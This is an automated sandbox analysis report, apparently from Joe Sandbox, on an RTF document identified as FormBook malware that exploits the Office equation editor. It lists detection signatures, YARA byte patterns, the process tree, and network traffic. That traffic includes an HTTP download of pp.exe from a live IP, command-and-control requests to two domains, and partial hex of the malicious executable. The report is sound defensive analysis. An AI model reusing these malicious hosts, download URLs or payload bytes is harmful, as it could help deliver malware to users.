Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report fqwBU8MyzT.rtf

Overview

General Information

Sample Name:fqwBU8MyzT.rtf
Analysis ID:321301
MD5:b115f24fcecce5e8661300527a748448
SHA1:9673703628a2edf4fea0b3a764357f82b4c9ce9f
SHA256:15655af972b632964f3327334c8809fb6cd6cd04e43f4548a32a5bb5743a75bc
Tags:Formbookrtf

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1276 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1428 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2492 cmdline: 'C:\Users\Public\vbc.exe' MD5: BB30A5DD4130B071FB4CA5F005371C63)
      • RegSvcs.exe (PID: 2560 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
      • RegSvcs.exe (PID: 2520 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wlanext.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
            • cmd.exe (PID: 2812 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 2700 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x67128:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x673a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x93748:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x939c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x72ec5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x9f4e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x729b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x9efd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x72fc7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x9f5e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x7313f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x9f75f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x67dba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x943da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x71c2c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9e24c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x68ab3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x950d3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x78b67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xa5187:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x79b6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.RegSvcs.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.RegSvcs.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.RegSvcs.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        6.2.RegSvcs.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.RegSvcs.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.207.38.170, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1428, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1428, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: fqwBU8MyzT.rtfAvira: detected
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exeReversingLabs: Detection: 35%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 35%
          Multi AV Scanner detection for submitted fileShow sources
          Source: fqwBU8MyzT.rtfReversingLabs: Detection: 48%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exeJoe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: 6.2.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: global trafficDNS query: name: www.auctionpros.club
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.207.38.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.207.38.170:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 19:04:32 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Thu, 19 Nov 2020 08:07:19 GMTETag: "ada00-5b471378e0ce7"Accept-Ranges: bytesContent-Length: 711168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 27 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 ba 0a 00 00 1e 00 00 00 00 00 00 6e d9 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c d9 0a 00 4f 00 00 00 00 e0 0a 00 20 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 b9 0a 00 00 20 00 00 00 ba 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 1a 00 00 00 e0 0a 00 00 1c 00 00 00 bc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 d8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 d9 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 50 e8 08 00 cc f0 01 00 03 00 00 00 02 00 00 06 c8 cd 01 00 88 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 1b 30 04 00 1f 00 00 00 01 00 00 11 00 00 28 1e 00 00 0a 28 05 00 00 06 00 de 02 00 dc 00 28 0b 00 00 06 02 28 06 00 00 06 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 13 30 04 00 ad 00 00 00 01 00 00 11 00 02 16 28 1f 00 00 0a 20 b0 cb 8b 1b 20 39 39 48 0e 61 25 0a 1d 5e 45 07 00 00 00 d0 ff ff ff 41 00 00 00 12 00 00 00 74 00 00 00 02 00 00 00 5b 00 00 00 29 00 00 00 2b 72 00 06 20 6b 78 5c 52 5a 20 46 88 3c 91 61 2b c3 02 17 28 07 00 00 06 00 06 20 8d ca c1 ee 5a 20 4a a6 e5 72 61 2b ac 00 02 17 28 20 00 00 0a 00 06 20 79 ff 5a 07 5a 20 59 e0 ad 40 61 2b 94 02 16 28 21 00 00 0a 00 06 20 c0 ad 34 ae 5a 20 ab a0 33 85 61 38 7a ff ff ff 02 16 28 22 00 00 0a 06 20 e1 cb c2 91 5a 20 c8 13 e9 49 61 38 61 ff ff ff 2a 00 00 00 13 30 04 00 44 00 00 00 01 00 00 11 00 20 66 37 11 69 20 59 84 7e 07 61 25 0a 19 5e 45 03 00 00
          Source: global trafficHTTP traffic detected: GET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1Host: www.sgbanfang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
          Source: global trafficHTTP traffic detected: GET /pp.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.207.38.170Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: unknownTCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD501063-4E04-4856-9DA8-291722E1F767}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /pp.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.207.38.170Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1Host: www.auctionpros.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1Host: www.sgbanfang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.auctionpros.club
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:06:00 GMTServer: ApacheAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/htmlConnection: closeData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 